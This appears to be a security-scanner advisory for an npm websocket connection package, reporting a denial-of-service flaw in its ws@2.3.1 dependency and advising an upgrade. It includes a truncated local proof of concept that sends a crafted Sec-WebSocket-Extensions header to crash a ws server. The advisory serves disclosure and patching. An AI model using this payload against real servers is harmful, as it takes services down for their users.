Splyt API connection handler.
Vulnerabilities 1 via 1 paths
Dependencies 78
Source npm

high severity

Denial of Service (DoS)

  • Vulnerable module: ws
  • Introduced through: ws@2.3.1

Detailed paths

  • Introduced through: @splytech-io/splyt-ws-connection@0.2.5 > ws@2.3.1
    Remediation: Upgrade to ws@3.3.1.


ws is a simple to use websocket client, server and console for node.js.

Affected versions of the package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.


const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
  const socket = net.connect(3000, function () {


Upgrade ws to version 1.1.5, 3.3.1 or higher.